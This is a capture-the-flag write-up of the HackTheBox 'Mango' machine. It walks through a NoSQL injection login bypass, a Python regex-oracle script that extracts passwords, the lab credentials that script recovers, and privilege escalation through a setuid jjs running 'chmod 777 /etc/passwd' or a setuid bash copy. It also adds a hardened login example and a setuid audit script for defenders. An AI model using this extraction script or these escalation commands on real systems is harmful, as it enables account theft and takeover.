# HackTheBox - Mango

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZhpQNgYZBOtqAAhQOu%2F-MZhxH01KZOkXMzqwaP_%2Fimage.png?alt=media\&token=135b7b46-4563-4dc5-a8db-fddff68975b3)

### Nmap scan results

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZhxO9FkRpX2ZcxT0P2%2F-MZhzIHNg4SIvbIruZG9%2Fimage.png?alt=media\&token=09f15af0-7736-4569-9740-603942bbb69c)

We have two web servers, one running HTTP and the other HTTPS. Let's add **`staging-order.mango.htb`** to the /etc/hosts file. Two different websites are served on staging-order.mango.htb, one over **HTTP** and the other over **HTTPS**.

![HTTPS Website](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZhxO9FkRpX2ZcxT0P2%2F-MZi-c1tcP5KAoYDXK8N%2Fimage.png?alt=media\&token=15baa339-c481-46d4-8fb1-fecd78d7d9d5)

![HTTP Website](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZhxO9FkRpX2ZcxT0P2%2F-MZi-h3EsIHlvfsc6xIn%2Fimage.png?alt=media\&token=a4a5a08e-c149-46de-ac98-371d4fcdc9dd)

I tried SQL injection on the **Mango Search Page** but didn't get anything. Let's scan the website with gobuster for files and directories.

### Scanning with gobuster

```bash
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://staging-order.mango.htb/ -x php,html,txt -o go-dirscan.out -t 50
```

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZi0WfjQQwF00RLpi2T%2F-MZi0Z8HxGt3SOlj1IWP%2Fimage.png?alt=media\&token=0d12c8b5-13f6-4d72-989e-d9a1f0a4d02f)

The login page on the insecure (HTTP) website looks suspicious. Let's try SQL injection on that.

### Trying SQL Injection on login page

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZi0WfjQQwF00RLpi2T%2F-MZi1IVSlTTFft1w8DN7%2Fimage.png?alt=media\&token=6fb81329-77bd-4cb7-bc23-362658c89561)

I tried all possible SQL injection payloads but that didn't give me anything. I also tried sqlmap to automate the process, but no luck :((

### Performing NoSQL Injection on login page

We can also try NoSQL injection, as the name of the box is similar to **`Mongo`**DB, a NoSQL database that stores documents made of **key-value** fields rather than SQL tables.

{% embed url="<https://book.hacktricks.xyz/pentesting-web/nosql-injection>" %}

{% hint style="info" %}
**NoSQL injection** vulnerabilities allow attackers to **inject** code into commands for databases that don't use SQL queries, such as **MongoDB**.
{% endhint %}

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZi0WfjQQwF00RLpi2T%2F-MZi340rGL0VS-c_3PaE%2Fimage.png?alt=media\&token=37b6d15f-e184-42b9-a1c2-5d0027db03e0)

If you now check the response, it is a redirect to the **`home.php`** page.

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZi0WfjQQwF00RLpi2T%2F-MZi3Mb1soAFdDx-P74S%2Fimage.png?alt=media\&token=936a70f0-6f32-4af2-93de-e2daec4fb33e)

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZi0WfjQQwF00RLpi2T%2F-MZi3oNqHaGp4IQvGx9L%2Fimage.png?alt=media\&token=d1474329-d2ea-48b2-b15d-6dd9280ebcd8)

### Extracting usernames and passwords

But that page doesn't give us anything useful on its own. The same injection can be used to enumerate the stored data: the `$regex` operator with a pattern anchored at the start of the field tells us, one character at a time, whether a guess matches the beginning of a user's password. I have created a script that recovers the users and their passwords this way.

```python
#!/usr/bin/env python3

import requests
import string

url = "http://staging-order.mango.htb/index.php"
#chars = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!&(),-:;<=>@^_{}~`-[]?+"
# Punctuation and whitespace are backslash-escaped so each candidate character
# is matched literally inside the $regex pattern instead of acting as a metacharacter.
possible_chars = list(string.ascii_letters) + list(string.digits) + ["\\" + c for c in string.punctuation + string.whitespace]

proxies = {'http': "127.0.0.1:8080"}  # pass proxies=proxies to requests.post to watch the traffic in Burp
passw = "^"  # anchor the pattern at the start of the password field

for i in range(20):
    print("[+] Position: %s" % i)
    for char in possible_chars:
        payload = {
            "username[$eq]": "admin",
            "password[$regex]": passw + char,
            "login": "login"
        }
        res = requests.post(url, data=payload, allow_redirects=True)
        # A successful login redirects to home.php, which contains the admin e-mail address
        if "admin@mango.htb" in res.text:
            print("[+] Found: %s" % (passw + char))
            passw += char
            break

print("[+] Completed")
```

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZi5XlPkPeom1EXklMf%2F-MZi6wenY-rsXjmAoq7m%2Fimage.png?alt=media\&token=626566ad-7845-41bb-9111-3f9b6e5cddfc)

Similarly, we can enumerate the other user and recover that user's password as well.

```text
# Got creds
admin : t9KcS3>!0B#2
mango : h3mXK8RhU~f{]f5H
```
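To make clear why the `[$ne]` bypass and the `[$regex]` prefix oracle above work, and what closes them, here is an added example that is not part of the original writeup or the box's code. It reproduces PHP's array-style parsing of form fields (`username[$eq]=admin` becomes a nested array) in Python, evaluates the resulting query with a small stand-in matcher that supports only `$eq`, `$ne` and `$regex` (it is not the real MongoDB driver), and contrasts a login handler that passes the form straight into the query with one that rejects any credential field that is not a plain string. The user collection, names and passwords are constructed placeholders, and `login_vulnerable` / `login_hardened` are hypothetical names.

```python
#!/usr/bin/env python3
"""Added example: PHP-style form parsing feeding a MongoDB-like query, shown in a
vulnerable and a hardened form. The matcher is a stand-in, not the real driver."""
import re
from urllib.parse import parse_qsl

# Constructed user collection; values are placeholders, not the box's data.
USERS = [
    {"username": "admin", "password": "Adm1n-pass!", "email": "admin@example.htb"},
    {"username": "mango", "password": "m4ng0-pass", "email": "mango@example.htb"},
]

# Matches keys such as password[$regex] -> ('password', '$regex')
_BRACKET = re.compile(r"^([A-Za-z_]\w*)\[([^\]]*)\]$")


def parse_php_form(body: str) -> dict:
    """Decode an x-www-form-urlencoded body the way PHP builds $_POST:
    'username[$eq]=admin' becomes {'username': {'$eq': 'admin'}}."""
    out: dict = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = _BRACKET.match(key)
        if m:
            out.setdefault(m.group(1), {})[m.group(2)] = value
        else:
            out[key] = value
    return out


def _field_matches(actual, cond) -> bool:
    """Evaluate one field condition with MongoDB-like semantics ($regex is a search)."""
    if not isinstance(cond, dict):
        return actual == cond
    for op, arg in cond.items():
        if op == "$eq":
            ok = actual == arg
        elif op == "$ne":
            ok = actual != arg
        elif op == "$regex":
            ok = isinstance(actual, str) and re.search(arg, actual) is not None
        else:
            raise ValueError(f"unsupported operator: {op}")
        if not ok:
            return False
    return True


def find_one(query: dict):
    """Return the first document satisfying every field condition, or None."""
    for doc in USERS:
        if all(_field_matches(doc.get(k), v) for k, v in query.items()):
            return doc
    return None


def login_vulnerable(body: str):
    """Hands the decoded form straight to the query: this is the pattern that lets
    '[$ne]' skip the password check and '[$regex]' act as a character-by-character oracle."""
    form = parse_php_form(body)
    return find_one({"username": form.get("username"), "password": form.get("password")})


def login_hardened(body: str):
    """Refuses anything that is not a plain string before it reaches the query."""
    form = parse_php_form(body)
    user, pw = form.get("username"), form.get("password")
    if not isinstance(user, str) or not isinstance(pw, str):
        return None  # an array or operator in a credential field is never legitimate
    return find_one({"username": user, "password": pw})


if __name__ == "__main__":
    bypass = "username[$ne]=x&password[$ne]=x&login=login"
    print("vulnerable:", login_vulnerable(bypass) is not None)  # True
    print("hardened:  ", login_hardened(bypass) is not None)    # False
```

The type check is the minimal fix; a fuller one also wraps the values explicitly (`{"username": {"$eq": user}}`) so that even a future refactor that drops the check cannot turn a field into an operator document, and compares a password hash rather than the plaintext the box stores.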

### Using SSH to get access as mango user

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZi5XlPkPeom1EXklMf%2F-MZi6YdlkgHNUz4GDDBk%2Fimage.png?alt=media\&token=0aebc512-746d-4d06-a717-cdee27d4b2a3)

![Using previously found password for admin](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZi5XlPkPeom1EXklMf%2F-MZi7YGvsGlLuZNC-TBj%2Fimage.png?alt=media\&token=2ff4033b-dfa2-468e-bf65-260b51422563)

### Privilege Escalation using [jjs](https://docs.oracle.com/javase/8/docs/technotes/tools/unix/jjs.html) (Java JavaScript)

{% hint style="info" %}
If you wonder what **jjs** stands for, it stands for **Java** JavaScript. The command is located in the `JDK_HOME\bin` directory. The command can be used to run scripts in files or scripts entered on the command line in interactive mode. It can also be used to execute shell scripts.
{% endhint %}

```bash
find / -perm -u=s -type f 2>/dev/null
```

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZi5XlPkPeom1EXklMf%2F-MZi8T7gaIju9Jp_rKkf%2Fimage.png?alt=media\&token=31fb688e-313f-4963-82d0-d1bb75e5feb0)

```javascript
// JJS script to get command execution
Java.type('java.lang.Runtime').getRuntime().exec('chmod 777 /etc/passwd')
```

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZi5XlPkPeom1EXklMf%2F-MZiCmtDA0YvhbCrVV7v%2Fimage.png?alt=media\&token=b89125dc-8668-4f7d-acd3-f52379a47d1d)

Now we can edit the /etc/passwd file and change the root password. **This is one way.**

Another way is to copy the **bash** binary to the tmp directory and then change its permissions to **`4555`** (setuid permissions).

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZi5XlPkPeom1EXklMf%2F-MZiEEJuhXAoZ5EEUSiO%2Fimage.png?alt=media\&token=c448f943-2f23-4331-ba7e-ac30f35738c4)
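From the defender's side, every step of this escalation leaves a condition a periodic audit can catch: a setuid interpreter such as jjs, a world-writable /etc/passwd, or a setuid copy of a shell sitting under /tmp. The following is an added example, not part of the writeup, of such an audit in Python. `scan()` does what the `find / -perm -u=s` command above does but also keeps the mode bits, and `audit()` checks each file against a baseline. The baseline, interpreter list and `SAMPLE_ENTRIES` are constructed placeholders; a real deployment would capture the baseline from a known-good host.

```python
#!/usr/bin/env python3
"""Added example: a setuid and sensitive-file permission audit. Lists and sample
data below are constructed placeholders, not taken from the box."""
import os
import stat
from typing import Iterable, List, Tuple

# Assumed baseline of setuid binaries captured on a known-good host (placeholder).
BASELINE = {"/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/newgrp"}
# Interpreters and shells that should never carry the setuid bit.
INTERPRETERS = {"jjs", "bash", "sh", "dash", "python", "python3", "perl", "php"}
TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
SENSITIVE = {"/etc/passwd", "/etc/shadow", "/etc/sudoers"}

# Constructed sample of (path, st_mode) pairs, as scan() would return them.
SAMPLE_ENTRIES = [
    ("/usr/bin/sudo", 0o104755),            # setuid, in baseline: fine
    ("/usr/bin/passwd", 0o104755),          # setuid, in baseline: fine
    ("/usr/bin/jjs", 0o104755),             # setuid interpreter
    ("/tmp/bash", 0o104555),                # setuid shell copied to /tmp
    ("/etc/passwd", 0o100777),              # made world-writable
    ("/usr/local/bin/mystery", 0o104755),   # setuid, unknown to the baseline
]


def scan(root: str) -> List[Tuple[str, int]]:
    """Walk root with lstat (symlinks are not followed) and return (path, mode)
    for every regular file, so the audit can inspect the full mode bits."""
    entries = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable; skip rather than abort the run
            if stat.S_ISREG(st.st_mode):
                entries.append((path, st.st_mode))
    return entries


def audit(entries: Iterable[Tuple[str, int]], baseline=BASELINE) -> List[Tuple[str, str]]:
    """Return (path, reason) findings for setuid files that are out of place and
    for sensitive files that are world-writable."""
    findings = []
    for path, mode in entries:
        base = os.path.basename(path)
        if mode & stat.S_ISUID:
            if path.startswith(TEMP_DIRS):
                findings.append((path, "setuid file in a temporary directory"))
            elif base in INTERPRETERS:
                findings.append((path, "setuid interpreter or shell"))
            elif path not in baseline:
                findings.append((path, "setuid file not in baseline"))
        if path in SENSITIVE and mode & stat.S_IWOTH:
            findings.append((path, "sensitive file is world-writable"))
    return findings


if __name__ == "__main__":
    # Run against the constructed sample; replace with audit(scan("/")) on a real host.
    for path, reason in audit(SAMPLE_ENTRIES):
        print(f"{reason}: {path}")
```

Run as root from cron and diff the output against the previous run; the first time `/usr/bin/jjs` or a setuid file under `/tmp` appears is the signal, and the world-writable check on `/etc/passwd` catches the first escalation path even if the setuid bit on jjs was an intended part of an image.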
